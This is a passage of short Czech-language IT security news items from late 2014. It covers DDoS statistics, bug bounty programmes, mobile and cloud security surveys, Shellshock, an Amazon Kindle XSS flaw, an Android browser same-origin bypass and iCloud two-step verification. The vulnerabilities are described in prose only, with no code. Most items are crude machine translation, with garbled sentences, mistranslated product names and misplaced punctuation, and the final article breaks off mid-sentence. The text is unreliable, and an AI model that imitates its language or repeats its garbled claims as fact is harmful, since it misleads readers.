Útoky nadále krátké trvání s opakovaným frekvence: Více než 90 procent útoků zjištěných trvala méně než 30 minut. Tento pokračující trend naznačuje, že webové stránky latence citlivé, jako je například on-line hraní her, eCommerce a hostingové služby by měly být připraveny na implementaci bezpečnostních řešení , která podporují rychlou reakci. High-rychlost, high-objem útoků zvýšil: objem DDoS byl provoz až celkově se třetina vrcholit u přes 500Mbps a více než pět procent dosahující až 4Gbps. Kromě toho, výsledky ukázaly, že více než 50% DDoS útoky byly nad 0.2Mpps v první polovině roku 2014, se zvýšil z přibližně 16%. A více než 2% DDoS útoků byla zahájena ve výši přes 3.2Mpps. Tři nejlepší DDoS metody útoku odhalila: HTTP Flood, TCP Flood a DNS Flood byly první tři typy útoku, společně tvoří 84,6 procent všech útoků. DNS Flood útoky držel své místo jako nejpopulárnější metody útoku, což představuje 42 procent všech útoků. Zatímco počet DNS a HTTP Flood útoků se snížil, TCP Flood útoky výrazně vzrostly. Zvýšení poskytovateli internetových služeb, podniků a on-line herní cíle: . útoků na poskytovatele internetových služeb se zvýšil o 87,2 procenta, podniky od 100,5 procenta a on-line hraní her o 60 procent Nejdelší, největší a nejvyšší frekvence útoků: Nejdelší jeden útok trval devět dnů a 11 hodin, nebo 228 hodin, přičemž jeden největší útok v rámci paketů za sekundu (pps), zasáhla v objemu 23 milionů pps. Více než 42 procent obětí útoku byly zaměřeny několikrát, zatímco jeden z každých 40 obětí byl opakovaně zasažen více než 10 krát. Nejvyšší frekvence útoků zažil jedinou obětí bylo 68 samostatných DDoS útoky . Ameen Pishdadi , zakladatel vůdce ochrany DDoS GigeNET , komentáře:. "Nejoblíbenější útoky vidíme, jsou odrazem DNS a NTP NTP byla obrovská na začátku roku a byly podstatně větší než normální, teď, že chyba NTP byl zapojený a čas pryč, že už servery byly oprava objemu velikosti a frekvence se snížila výrazně. " Výsledky statistické analýzy a hlavních připomínek jsou založeny na údajích z aktuální incidentů DDoS útoků, ke kterým došlo v průběhu první poloviny roku 2014 byly shromážděny údaje z kombinace globálních společností, poskytovatelů internetových služeb, regionálních telekomunikačních operátorů a internetových hosting společnosti. Srovnání jsou založeny na 1H2014 ve srovnání s 2H2013.


Blackphone a Silent Circle oznámit chybu bounty programu
1.10.2014 Mobil
Blackphone a Silent Circle dnes oznámila uvedení svého chyba nájemný programu. Posláním obou společností je umožnit bezpečné a soukromé komunikace pro jednotlivce a podniky.

Program Silent Circle zahrnuje klientské aplikace, síťové služby, cloud infrastruktury, webové stránky a webové služby. Silent Circle zaplatí minimálně 128 dolarů za související bezpečnostní chyby. Program Blackphone zahrnuje PrivatOS, aktualizační servery a související webové portály. Blackphone zaplatí minimálně 128 dolarů za související bezpečnostní chyby. Použití oprav prémií podporuje kvalifikované nezávislé výzkumníky půjčovat své znalosti v uživatelské komunity kolem jejich produktů, a crowdsourcing penetrační testování a aplikační hodnocení , což má za následek více bezpečné a stabilní nabídky. " Máme vysoké nároky na bezpečnost a soukromí. Za účelem splnění našich očekávání, musíme neustále budovat silný vztah s výzkumnou bezpečnostní komunity, "řekl Dr. Daniel Ford, ČSÚ z Blackphone a Silent Circle. "Zajištění soukromí svých uživatelů je jádrem toho, co dělat, aby bezpečnost zásadní význam, "řekl Toby Weir-Jones, generální ředitel společnosti Blackphone. "Uvedením našeho Bugcrowd chyba nájemný programu, obě společnosti zajistit svým zákazníkům, že jejich smartphone a komunikační software je vystaven nejnovější testování a posuzování technologií, a zároveň poskytuje určitou formu kompenzace pro úspěšné přispěvatelů.


Mobilní zabezpečovací zařízení je obětována účinnost pracovní síly
1.10.2014 Mobil
Zatímco mobilní zařízení jsou nedílnou součástí na pracovišti, kybernetické bezpečnostní postupy a rozpočty ve většině organizací se nedrží krok s rostoucím počtem zařízení, které musí být spravovány a uchovávány v bezpečí.

Podle nového průzkumu Raytheon, 52 procent organizací a zaměstnanci často obětovat bezpečnostních postupů uvědomovat výhody účinnosti mobilního připojení. Zpráva byla provedena vedoucí informační bezpečnosti průmyslu Ponemon Institute. Komplexní zpráva je založena na 618 respondentů, kteří provádějí podnikového zabezpečení, spravovat mobilní technologie a platformy a nastavit mobilní strategii. Padesát sedm procent respondentů se označilo za vedoucích pracovníků / manažerů. Podle výzkumu, v průměru jednu třetinu zaměstnanci používají výhradně mobilní zařízení ke své práci, a to se očekává, že výrazně zvýší v průměru o 47 procent zaměstnanců v příštích 12 měsících. I ve světle tohoto očekávaného růstu 64 procent dotázaných tvrdí, že tomu tak není v současné době ani očekávat, že dostatečný rozpočet pro zmírnění nebo oslabit zabezpečení mobilních zařízení hrozby kybernetické. Navzdory stále vysokou úrovní bezpečnostních rizik kybernetických s mobilními zařízeními, horní dvě metody dnes používány - Mobile Device Management (MDM) a bezpečné nádoby - nejsou dostatečné. Ve skutečnosti, polovina dotázaných nejsou spokojeni se současnými mobilní bezpečnostní řešení jejich organizace, a 57 procent se shodli, že provádění řešení virtualizační bázi, která udržuje data z aktuálního zařízení, by měly být brány v úvahu. "Tento průzkum poukazuje na skutečnost, že existuje snaha najít rovnováhu mezi potřebami kybernetické bezpečnosti v organizaci a efektivnosti požadovaných zaměstnanců ke své práci, "Ashok Sankar, senior ředitel produktového managementu a strategie v Raytheon Cyber ​​produkty. "Mobilní zařízení jsou stále dominantním nástrojem pracoviště a organizace musí přijmout mobilní strategii pro zabezpečení dat technologií, která umožňuje zaměstnancům pracovat efektivněji, aniž by citlivé informace v ohrožení."


Evropské banky a Europolu spojit své síly v boji proti počítačové kriminalitě
1.10.2014 Kriminalita
Evropská bankovní federace (EBF) a Evropské centrum pro boj proti kyberkriminalitě Europolu (EC3) podepsaly memorandum o porozumění (MoP), které dláždí cestu pro posílení spolupráce mezi donucovacími a finančního sektoru v EU.
S rostoucí "cyberisation" trestné činnosti ovlivňující finanční sektor, se očekává, že užší spolupráce mezi EBF a EC3 mít pozitivní výsledky v prevenci a boji proti trestné činy zítřka, včetně stále sofistikovanějších phishingových technik a šíření mnoha variací bankovní malware / permutace. Obě organizace usnadňují připojení nepostradatelné partnery: EBF odkazy vedoucí finanční instituce dohromady a EC3 spojuje počítačové kriminality rozdělení policejních sil v členských státech EU. Memorandum umožňuje výměnu odborných znalostí, statistik a dalších strategických informací mezi oběma stranami. To umožní výměnu údajů o hrozbách, aby finanční instituce, aby se chránili, zatímco okamžité hlášení nových malware a vyvíjející se prostřednictvím platebních podvodů umožňuje vymáhání práva, aby prošetřila a zatknout chytrý a "tech-důvtipný" pachatele. Spolupráce mezi právem výkon a finanční sektor již vedla k několika provozních úspěchů a úspěšných preventivních opatření. Dobrým příkladem je podvod platební karta. I když se dopustil podvodu je v současné době mnohem složitější kvůli bezpečnostním opatřením, které organizované zločinecké skupiny zapojené do stahováním a kovacích karet byly prošetřeny, stíháni a uvězněni. Troels Oerting, ředitel Evropského centra pro boj proti kyberkriminalitě (EC3), říká: "Dnes si připomínáme významný den .. pro vymáhání práva v EU a v bankovním sektoru jsme se dohodly na posílení vzájemné spolupráce, respektovat příslušné vnitrostátní právní předpisy, aby společně posílí naši schopnost bránit, stíhání a narušit počítačovou trestnou činností proti finančním sektoru To je více než slavnostní gesto - to je . vytvoření důvěryhodného vztahu, jehož cílem je dosažení hmatatelných výsledků, které budou dělat život těžší pro zločince a život snadnější pro bankovní sektor a všechny z nás, kteří používají tyto důležité služby " Wim Mijs, výkonný ředitel Evropské bankovní federace, řekl: "Naši členové již intenzivně spolupracovat s jejich vlastními, národními policejními orgány za účelem boje s finanční počítačové trestné činnosti. Naše spolupráce s Europolem nyní přidává evropský rozměr této důležité práci. . Mezinárodní spolupráce mezi bankami a donucovacími orgány je nezbytná, protože je jasné, že zločinci neznají hranic " Keith Gross, předseda EBF IT pracovní skupiny podvodům a vedoucí finanční kriminality a bezpečnosti v bankovnictví a platby federace Irska, říká: "Počítačová kriminalita dělá značné škody pro společnost. To je důvod, proč formalizovat naše stávající vztahy s Europolem, je důležitým krokem. Banky jsou na frontové linii v tomto boji každý den. Tento druh trestné činnosti se rychle vyvíjí a stává se stále sofistikovanější. "


McAfee přináší nové bezpečnostní apartmá
1.10.2014 Zabezpečení
McAfee vydala McAfee Antivirus Plus 2015, McAfee Internet Security 2015, McAfee Total Protection 2015, a McAfee LiveSafe služby 2015, který chrání data a identitu zákazníka napříč všemi počítači, počítači Mac, chytré telefony a tablety, které vlastní.

McAfee nedávno zmodernizoval svůj motor detekci malware pro zlepšení detekce a výkon zařízení, pomáhá chránit spotřebitele před dnešními pokročilými hrozbami. Také cross-device produktu je možnost snadno přidat další prostředky pro ochranu s pouhým jedním kliknutím. Navíc McAfee LiveSafe služby 2015 představuje novou generaci ochrany cross-zařízení pro spotřebitele, které pomohou udržet jejich zařízení, osobní údaje a identitu bezpečné . Jako první sada zabezpečení zahrnovat nejmodernější hlasové a ověřování rozpoznání obličeje, mohou uživatelé bezpečně ukládat citlivé a osobní informace, například závěti, listiny a pasů v bezpečné úložiště cloud úložiště. McAfee LiveSafe služby 2015 také zahrnuje cloud-based správce hesel, takže uživatelé mohou snadno spravovat své on-line hesel. Podle nedávné studie společnosti McAfee, zabezpečení budoucnosti digitálního Americe v roce 2025, průměrná amerických domácností vlastní tři až sedm zařízení, a to předpovídá toto číslo bude v příštím desetiletí téměř zdvojnásobí. dnes a stále více v budoucnosti, bezprecedentní množství soukromé a osobní údaje jsou a budou shromažďovány a distribuovány, zejména pokud více spotřebitelů přesunout pomocí připojeného spotřebiče a nositelné. S tím přichází zvýšené riziko pro řadu sofistikovaných útoků a podvodů. S ohledem na tyto poznatky, McAfee nadále poskytovat nové a lepší výrobky, aby splňovaly rostoucí požadavky spotřebitelů, jak tráví více času na připojených zařízeních. "S nárůstem připojených zařízení a jako spotřebitelé připojit více zařízení, bude bezpečnostní potřeby dramaticky změnit a vyvíjet, "řekl Gary Davis, šéf bezpečnosti spotřebitele evangelista u společnosti McAfee. "S ohledem na tuto skutečnost, abychom i nadále pevně odhodlána poskytovat inovace, které chrání digitální život spotřebitelů v celé zařízení, které používají všude tam, kde se rozhodnou připojit."


Eset vylepšuje svou vlajkovou loď -- třeba o anti-botnet

1.10.2014 Zabezpečení
Své klíčové antimalwarové systémy pro SOHO a domácnosti inovoval Eset. Smart Security 8 například obsahuje technologii Botnet Protection, spolu s NOD32 Antivirus 8 také zahrnuje vylepšený modul Exploit Blocker, jenž chrání i před zranitelnostmi Javy.

Botnety představují podle zprávy Verizon Data Breach Investigation Report zdaleka největší jednotlivou kategorii počítačové kriminality – podíl botnetů na celkové zdokumentované počítačové kriminalitě tvoří podle uvedené zprávy 86 procent.

Technologie Botnet Protection chrání počítač, aby se stal součástí botnetu a byl zneužitý k rozesílání spamu nebo k útokům na vzdálené servery. Proto analyzuje odchozí síťovou komunikaci a hledá podezřelé příznaky. Kontroluje také, zda server, k němuž se chráněný počítač připojuje, není na seznamu pochybných serverů, spojených s aktivitami botnetů. Pokud ano, podezřelou aktivitu zablokuje.

Vylepšení technologie Exploit Blocker zase posiluje ochranu nejčastěji používaných aplikací, jako jsou čtečky PDF dokumentů, součásti kancelářského balíku Microsoft Office nebo nově také Java.

Konkrétně útoky na zranitelnosti v Javě představují podle průzkumu firmy Cisco víc než 90 procent ze všech zaznamenaných útoků na počítače. Exploit Blocker nepřetržitě sleduje procesy a v případě podezření na podezřelé chování potenciálně škodlivou aktivitu zablokuje a popis případu odešle do cloudového systému Eset Threat Sense, odkud se využívá i pro další uživatele.

Smart Security má rovněž vylepšené uživatelské rozhraní pro snadnější ochranu přístroje před ztrátou či krádeží.


Útočníci zneužívají chybu Shellshock

30.9.2014 Zranitelnosti
Výzkumníci již zaznamenali několik útoků na webové stránky a servery za použití kritické chyby Shellshock.

Zranitelný software používají milióny serverových jednotek, přičemž výzkumníci zatím hovoří o tisícovkách napadených serverů. Má se však za to, že počet útoků poroste s tím, jak se bude internetem šířit škodlivý kód. Útočníci napadené počítače využívají například k vytváření botnetů.

Chyba nazvaná Shellshock byla objevena v shellu Bash, který je široce používán především unixovými operačními systémy a v Linuxu a nachází se i v mnoha jejich variantách. V ohrožení jsou tedy i uživatelé systému Mac OS X od Applu, přestože společnost tvrdí opak a uživatele chce uklidnit uvolněním rychlé opravy.

Podle Jaimeho Blascoa z bezpečnostní firmy AlienVault útočníci používají skenovací programy, pomocí kterých se snaží najít napadnutelné počítače. V případě pozitivního nálezu jim pak nic nebrání v instalaci malwaru.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »

Kontrola, kterou mohou útočníci po ovládnutí počítače získat, činí ze Shellshocku potenciálně větší problém, než jakým byla zranitelnost Heartbleed objevená v dubnu letošního roku. „Heartbleed pouze útočníkům zpřístupnil určité informace, zatímco díky Shellshocku mohou získat kontrolu nad vašimi servery a weby,“ uvedl Kasper Lindegaard z firmy Secunia.

O závažnosti celé situace svědčí i to, že britská vláda zveřejnila prohlášení, ve kterém uvedla, že pro tamní kyberbezpečnostní složky má Shellshock nejvyšší prioritu. Podobný postup se očekává i od amerických a kanadských úřadů. S chybou se nějakým způsobem snaží vypořádat i velké technologické firmy, jako jsou Amazon, Google nebo Akamai.


XSS chyba umožňuje Amazon účtu únos
29.9.2014 Zranitelnosti
Opakující se XSS chyba v Kindle Library Amazon, tedy "Správa vašeho Kindle" webové aplikace, může být zneužita útočníky, kteří se snaží unést Amazon účtu uživatelů, německý výzkumník varoval . Aby tento útok fungoval, musí být uživatel napálil do přidání e-book, který obsahuje konkrétní skript v jeho metadat svého Kindle knihovny a potom otevřete webovou stránku Kindle Library. Až to bude hotové, kód je automaticky spuštěn, a útočník může sklízet Amazon účtu cookies, které pak lze použít k získání přístupu k účtu oběti. Aby jí dokázal svou pravdu, Mussler vytvořil soubor Proof-of-Concept, který obsahuje skript v názvu metadat a dala k dispozici ke stažení, takže ostatní mohou ověřit svá tvrzení. Ale zdá se, že chyba není nic nového. On nejprve objevil v listopadu 2013 a oznámí Amazon to. Tým Information Security společnosti fixní, ale pro zatím neznámého důvodu znovu chybu v nové (nejnovější) verze "řídit svůj Kindle" web app. Mussler varoval Amazon opět o existenci chyby, ale neslyšel zpět od nich za dva měsíce, což ho vedlo k tomu, aby se informace zveřejní. chyba ovlivňuje každého, kdo používá Kindle knihovnu Amazon pro ukládání e-knihy, nebo dodat je do Kindle, ale uživatelé, kteří stahují pirátské e-knihy z třetí strany Zdroje jsou určitě ve větším nebezpečí než těm, nákup knih od Amazonu. Když Mussler zpočátku našel chybu, on byl také testován Calibre e-book aplikace pro správu, které někteří používají jako alternativa k Kindle knihovny Amazon, a zjistil, že je také zranitelná. Naštěstí pro uživatele, Calibre, chyba byla opravena v rekordním čase.


Internet obři se spolčí s cílem zlepšit open source programů
29.9.2014 IT
Skupina společností, které patří Facebook, Google, Dropbox, GitHub a Khan Academy oznámil novou spolupráci, která se zaměří na to, aby open source "jednodušší pro každého".

Dalšími zakládajícími členy skupiny TODO jsou Box, Dropbox, čtverec, proužek, Twitter a Walmart Labs, ale podle NYT , program byl již připojilo dalších 30 firem. "Open source je součástí struktury každého z nás . společnosti Mezi námi, naše open source programy nám umožňují použít, přispívají k, a udržovat, tisíce projektů - velké i malé, "skupina poukazuje na to . "Tyto programy se potýkají s mnoha problémy, včetně zajištění kvalitní a časté úniky , setkávání s vývojářských komunit, využívání a účinně přispívat zpět do dalších projektů. " "Skupina - jejíž jméno je backronym pro" mluvit otevřeně, rozvíjet otevřeně "- byl vytvořen s cílem řešit výzvy, že společnosti, jako je ta naše setkaly při náročné otevřeno source software a běží open source programů, "James Pearce, vedoucí open source projektů na Facebooku, který sdílí na svém blogu. "Chceme spustit lepší, působivých open source programy v našich společnostech, chceme, aby bylo snazší lidé konzumovat technologií, které open source; a chceme pomoci vytvořit plán pro společnosti, které chtějí vytvořit své open source programů, ale nejsou si jisti, jak postupovat. " Cílem skupiny je vytvořit plán pro organizace, firmy a jednotlivce, kteří chtějí založit a úspěšně řídit open source projekt, a objevit nejlepší způsob, jak předat open source projekty, založená společností komunity, která bude pokračovat v jeho vývoji, a jak zajistit trvalý úspěch projektů tím, udržování společenství aktivní.


Cisco představila hrozeb zaměřených na příští generace firewall
29.9.2014 Zabezpečení
Cisco představila hrozby zaměřené na Next-Generation Firewall (NGFW). Cisco ASA s palebnou silou Services poskytuje kompletní kontextové povědomí a dynamické kontroly nezbytné, aby se automaticky vyhodnotit hrozby, korelují inteligenci a optimalizovat obrany k ochraně všech sítí.

Až do teď, NGFWs se zaměřili na politiky a aplikační řízení a byly schopny řešit pokročilé a zero-day útoků. Cisco ASA s palebnou silou Services změní to, s viditelnost řízený, hrozba zaměřené na platformě založený přístup: Viditelnost řízený - Přináší plnou kontextové povědomí uživatelů, mobilní zařízení, na straně klienta, aplikace, virtuální stroj-k-stroj komunikace, zranitelnosti, hrozby, URL a další důležité telemetrie. Jeho funkce pro správu podnikové třídy poskytují uživatelům řídicích panelů a drill-down zprávy o objevených hostitelů, podezřelých aplikací, hrozeb a ukazatelů kompromisu (IoCs) pro komplexní viditelnosti. Threat zaměřený - Obsahující vedoucí NGIPS pro komplexní ochranu před známými a pokročilých hrozeb , stejně jako AMP pro boj proti zero-day a přetrvávající útoky. Velké analytických údajů, kontinuální analýza a Cisco kolektivní bezpečnosti Intelligence (CSI) pracují společně, aby zjistily, blokování, sledování, analýzy a sanace funkce na ochranu proti celé spektrum útoků, známých i neznámých. platforma na bázi - Cisco ASA s palebnou silou Služby v sobě spojuje osvědčené funkce brány firewall a řízení aplikací, vedoucí schopnosti NGIPS a pokročilou detekci narušení a sanace v jednom zařízení. Integrace poskytuje organizacím lepší ochranu a zároveň snížit provozní náklady a složitost. Toto nové řešení zjednodušuje bezpečnostní architektury organizace a snižuje jeho sítě stopu s menším počtem bezpečnostních zařízení pro správu a nasazení a schopnost licencovat předplatné rozšíření funkčnosti. Cisco ASA s viditelností palebnou silou službách a průběžné analýzy detekovat pokročilé, multi-vektorové hrozbám a racionalizuje a automatizuje odpověď na známých i neznámých malware. Nabízí také komplexní, žalovatelné IoCs, že vyšetřování rychlost hrozeb a zpětně sanaci, spolu s integrovaným stanovení rozsahu reakce na incidenty a automatické aktualizace politiky detekce. Všechny tyto inovace jsou podporovány podnikové třídy stavový firewall, VPN, pokročilé shlukování a granulární aplikační vrstvě a kontroly z hlediska rizik, která vyvolávají míru NGIPS politiky detekce hrozeb pro optimalizaci účinnosti zabezpečení. integrace Open source zabezpečení s Snort, OpenAppID a ClamAV dalším zákazníkům umožňuje snadno přizpůsobit zabezpečení tak rychle, jak je to možné řešit nové nebo konkrétní hrozby a aplikací.


"Win zdarma iPhone 6" podvody hit Facebook
29.9.2014 Sociální sítě
Vzhledem k tomu, den vydání Apple iPhone 6 a iPhone 6 Plus se blíží, podvodníci se očekávaně začali používat nové zařízení, jako návnadu na Facebooku podvody. Jako obvykle, nabídka je zdarma iPhone - stačí projít "tři jednoduché kroky ", aby dostal šanci vyhrát zařízení: jako stránce na Facebooku vytvořil šíření podvod, sdílet je se svými přáteli na Facebooku a stáhnout" přihlášky k účasti. " Ale dříve, než to poslední krok lze provést, bude strana nutit můžete dokončit průzkum, aby mohl pokračovat. Podle průzkumu, budete také požádáni, aby vaše jméno, adresu, telefonní číslo a e-mailovou sdílet -. Informace, které jsou shromážděné třetí stranou provozující stránky průzkumu a pravděpodobně prodává na marketingu "Mezitím, podvodník, který vytvořil fake podpora bude vydělávat provize přes podezřelého affiliate marketing systém pokaždé, když vyplníte průzkumu a poskytnout své údaje, "Hoax-Slayer poukázal . "A pokaždé, když se vrátíte na stránku pro stažení, bude pop-up vás informovat že průzkum nebyl řádně vyplněn, nebo došlo k "malé chyby". Budete vyzval k účasti na dalším průzkumu. Ale bez ohledu na to, kolik průzkumy dokončíte, budete ještě dostat stáhněte "žádost". " Tento konkrétní podvod stránka odstranil Facebook, ale než se dostane téměř 18.000 "rád". Vzhledem k popularitě Apple smartphone, je to bezpečné říci, že podobné programy budou pravidelně objevovat v příštích měsících a dokonce i mimo ni. Zjistil jsem, že - a hlásil - některé z nich už.


Systémové poruchy způsobují většinu velkých výpadky komunikačních služeb
29.9.2014 Hrozby
Agentura Evropské unie pro bezpečnost sítí a informací (ENISA) zveřejnila zprávu o rozsáhlé výpadky v odvětví elektronických komunikací. Poskytuje souhrnnou analýzu bezpečnostních incidentů v roce 2013, které způsobily vážné výpadky.

Většina incidenty hlášeny regulátory a ENISA podílí mobilního internetu a mobilní telefonie připojení. Nejčastějšími příčinami jsou poruchy systému, které ovlivňují především základnových stanic a přepínačů. Výroční zpráva je výsledkem procesu široký incidentu EU, podávání zpráv, který byl zahájen v roce 2012, na základě článku 13a rámcové směrnice (2009/140 / ES). Incidenty jsou hlášeny na národní operátory k vnitrostátních regulačních orgánů (NRA). . Nejzávažnější výpadky jsou hlášeny každoročně vnitrostátními regulačními orgány na agenturu ENISA a Evropské komise Hlavní závěry jsou shrnuty níže: 90 vážné incidenty hlášeny: . Letos 19 zemí uvedlo 90 významné události, zatímco devět zemí oznámilo žádné významné události Mobilní sítě nejvíce postižených: Přibližně polovina z hlavních výpadků podílí mobilního internetu a mobilní telefonie. Vliv na tísňová volání: 21% z velkých incidentů mělo dopad i na tísňových volání (přístup k 112). Většina (61%) výpadky způsobené selháním systému: Most . času tato selhání systému byly softwarové chyby, selhání hardware a software chybám, které ovlivňují přepínače a základnových stanic Přírodní jevy mají největší dopad z hlediska uživatelských hodiny ztratil: Často drsné počasí (husté sněžení, vichřice), vedl k napájení nebo kabelů řezy , což vedlo k vážným výpadkům v oblasti uživatelských hodin ztracených. Majetek většinou byly postiženy základnových stanic, přepínače a mobilní ústřednou. Výkonný ředitel agentury ENISA profesor Udo Helmbrecht komentářů: "veřejné komunikační sítě a služby jsou páteří digitální společnosti EU. Naším cílem je přispět ke zvýšení odolnosti a bezpečnosti elektronické komunikace. Hlášení a diskutovat o skutečné události Incident je důležité porozumět rizikům a co může být lepší. ENISA bude nadále spolupracovat s regulačními orgány EU v oblasti telekomunikací na podporu účinné a efektivní podávání zpráv o bezpečnostních událostech. "


Kritická Android Browser chyba ohrožuje soukromí uživatelů
29.9.2014 Zranitelnosti
Začátkem tohoto měsíce, bezpečnostní výzkumník Rafay Baloch se vydala k proof-of-concept exploit, který využívá zranitelnosti v bezpečnostním mechanismem se systémem Android prohlížeče a může umožnit útočníkovi sklizeň citlivá uživatelská data. "Tím, že malforming si javascript: handler URL s předřazen null byte, útočník může vyhnout stejného původu politiky (SOP), bezpečnostní kontroly prohlížeč Android Open Source platforma (AOSP) Prohlížeče, "Tod Beardsley, Rapid7 inženýr, vysvětlil . "Co to ​​znamená, libovolnou webovou stránku (řekněme, jeden . řízen spammer nebo špion), může nahlédnout do obsahu jakékoliv jiné webové stránky Představte si, že jste šel do útočníků místě, když jste měli svůj webmail otevřený v jiném okně - Útočník by se mohl škrábat vaše e-mailová data a zjistit, co vaši prohlížeč vidí. hůř, mohl by zachytit kopii cookie a unést vaši relaci zcela a číst a psát webmail vaším jménem. " "Zatímco AOSP prohlížeč má" byl zabit off "od společnosti Google, je velmi populární, a to i na moderních zařízeních používaných sofistikované uživatele, kteří preferují legální prohlížeč na Google Chrome, Firefox, Dolphin, nebo jiných prohlížečů, "Beardsley zdůraznil a dodal, také to, že téměř všechny nižší-end předplacených telefonů z hlavních výrobců a dopravci jsou stále dodávány s to nepodporovaný prohlížeč a pre-4.4 staví na Androidu. Tým Rapid7 vydala Metasploit modul pro využití chybu, a podle Baloch, Google potvrdil, že se pracuje na opravy pro Android verze před posledním (v4.4 , tedy KitKat). Jedinou otázkou nyní je, jak přesně se mají na mysli, aby se zasadila tuto opravu. Jak Peter Bright poznamenal , AOSP Browser je obvykle aktualizován pouze aktualizací operačního systému. "Včasná dostupnost Android aktualizací zůstává problematickým bodem pro operační systém, takže i když Google vyvíjí opravu, to může také být k dispozici pro ty, kteří skutečně Potřebuji to, "podotkl. V současné době mohou uživatelé chránit tím, že upustí Android prohlížeč a začít používat alternativní ten, který je určitě nebude založena na stejném kódu: Firefox, Opera a Chrome.


Apple dodává ověření ve dvou krocích pro iCloud
29.9.2014 Zabezpečení
Apple oznámil, že možnost ověření ve dvou krocích pro iCloud účty nyní vztahuje i na iCloud zálohování, brání útočníky, kteří vědí, u cíle heslo z instalace u cíle zálohu na nové zařízení a z ní vyplývající, od přístupu k informací v něm obsažených.

Tento krok byl oznámen prostřednictvím e-mailu zaslaného na úterý pro všechny uživatele, kteří se již s použitím ověření ve dvou krocích chránit své Apple ID. Příjemci byli namířenou na dvoustupňovém ověření FAQ stránky pro další informace. Pokud je zapnuta funkce ověření ve dvou krocích, druhý ověření faktor - 4-místný ověřovací kód zaslán telefon uživatele - musí být zadáno při registraci do Moje Apple ID; do iCloud; nákupům iTunes, iBooks, nebo App Store od nového zařízení; a při nastupování Apple ID pomoc týkající od společnosti Apple. Tato změna byla urychlena nedávném úniku nahých fotek celebrit, krádež, která byla původně obviňován na iCloud hack. O několik dní později, Apple už uvedl, že iCloud nebyl pirát, a nyní se zdá pravděpodobné, že unikly fotografie byly ukradeny útočníky, kteří tušené nebo hrubou vynucených Apple hesla k účtu oběti, nebo mají sociální inženýrství nebo napálil oběti k prozrazení hesla. V té době, Apple doporučuje uživatelům používat silná hesla a umožnit ověření ve dvou krocích, ale bylo zjištěno, výzkumníky zabezpečení ověření ve dvou krocích nechránil iCloud. Ars Technica se kontroluje , zda změna byla provedena správně, a to má. Bohužel, konkrétní heslo lámání nářadí stále být použity pro přístup k účtům, které nebyly dodatečně chráněny pomocí ověřování ve dvou krocích, což je dobrý důvod ji zapnout -. pokud je to možné ověření ve dvou krocích je k dispozici v 59 zemích, v současné době (Podívejte se na dvoukolová Krok ověření FAQ stránku na seznamu).


72% podniků, kterým nedůvěřujete cloudu dodavatele
29.9.2014 Analýzy
K dispozici je rozšířená nedůvěra poskytovatelů cloudových celé Evropě sedm z 10 podniků a obvinili je z nedodržení právních předpisů o ochraně osobních údajů a soukromí, v závislosti na Netskope a Ponemon Institute.

Studie ukazuje, že 53% respondentů uvedlo, že pravděpodobnost narušení dat se zvyšuje v důsledku oblaku a studie Ponemon Institute také zjistila, že narušení bezpečnosti osobních údajů zvýšení očekávaného ekonomického dopadu až o tři časy, kdy oni zahrnují cloud. Tento jev je známý jako "cloud multiplikační efekt," a výzkum zjistil, to se týká v různé míře v souladu s různými cloudových scénářů, jako je například zvýšená sdílení dat z cloud aplikací nebo zvýšené využívání mobilních zařízení pro připojení k mraku. Použití dříve zavedenou cenu ve výši € 136 za ohrožení záznamu, ztráty nebo odcizení 100 tisíc zákazníků záznamů by stálo organizaci € 13.6m. Ale když byli respondenti požádáni o potenciálních dopadů v důsledku zvýšené využívání cloudových služeb, jejich nedostatek důvěry tlačí je ztrojnásobit pravděpodobnost narušení dat. Za předpokladu, že nárůst cloud storage, Odhadnutá pravděpodobnost narušení dat zahrnující ztrátu nebo krádež informací vysoké hodnoty nebo duševní vlastnictví zvedne o 126%. Kromě toho respondenti vnímají, že pouhé zvýšení využívání jakýchkoliv cloudových služeb způsobí dopad porušení dat stejného typu jít až o 159%. A konečně, IT odborníci k závěru, že rychlý růst prodejce a volatilita poskytovatele cloudu by mohlo zvýšit pravděpodobnost narušení dat zahrnující ztrátu 100.000 zákazníků záznamů nebo více o 108%. Výzkumem bylo zjištěno, všeobecná nedůvěra poskytovatelů cloud:

Kromě 72% respondentů uvedlo, že věří, že poskytovatelé cloudu nejsou v souladu s právními předpisy na ochranu osobních údajů, 84% respondentů také nepochyboval, že jejich poskytovatelé cloud služeb by je neprodleně oznámit, pokud byla porušena jejich práva duševního vlastnictví nebo důvěrné obchodní informace,
77% dotázaných tvrdilo, že jejich poskytovatelé cloudu by se okamžitě oznámí svou organizaci kdyby porušení dat, zahrnující ztrátu nebo odcizení zákaznických dat.
64% IT profesionálů, si myslí, že používání jejich organizace z cloudových služeb snižuje jeho schopnost chránit důvěrné informace a 59% se domnívá, že je velmi obtížné zajistit kritických podnikových aplikací. V kontrastu, většina respondentů stále považován za mrak být stejně bezpečná nebo bezpečnější než v prostorách IT, což možná naznačuje, více o jejich nedostatku důvěry v jejich on-prostory nástrojů zabezpečení, než to dělá o jejich důvěry ve schopnosti zabezpečení poskytovatelů cloudových služeb. "Tato studie dokazuje, že některé firmy se potýkají s stínu IT a potřebují mnohem větší přehled o tom, jaká data a aplikace jsou přístupné v cloudu a pokyny o tom, jak by měly analyzovat dodavatele," řekl Sanjay Beri, generální ředitel a co -founder z Netskope. "Všichni víme, že cloud nabízí zvýšení produktivity, ale to by nemělo být na úkor bezpečnosti. Naši respondenti se shodli, že mrak má potenciál být bezpečnější než v prostorách, ale je to pravda pouze v případě, že mají schopnosti prosazování politiky spojené s hlubokým kontextuální přehled o cloud transakcí - zejména těch týkajících se citlivých dat. " Evropa a USA: jak porovnat porovnání výsledků této studie s předchozí studii Netskope a Ponemon Institute, která vyšetřovala cloud multiplikační efekt v USA, evropské organizace jsou jistější ve své schopnosti zabezpečit cloud. 51% respondentů v USA tvrdí, že efektivita jejich organizace v oblasti zabezpečení dat a aplikací je "nízká". Zdvojnásobit procento evropských respondentů, kteří cítí stejně (25%) Stejně tak 52% evropských IT profesionály hodnocené účinnosti jejich organizace jako "high ", ale pouze 26% respondentů v USA se dohodly, že jejich organizace je vysoce efektivní při zabezpečení dat a aplikací v cloudu. "právní a správní předpisy pro ochranu údajů jsou jistě stále těžké hledat v těchto dnech, a to platí zejména v Evropě," řekl Dr. . Larry Ponemon, předseda a zakladatel Ponemon Institute. "Domnívám se, že nízká hlasování o důvěře v cloud dodavatelů vidíme, je v důsledku tohoto zvýšené kontrole a" strachu z neznámého. " Překonat to trvá lepší pochopení bezpečnostních opatření dodavatele a jak lidé používají oblak na prvním 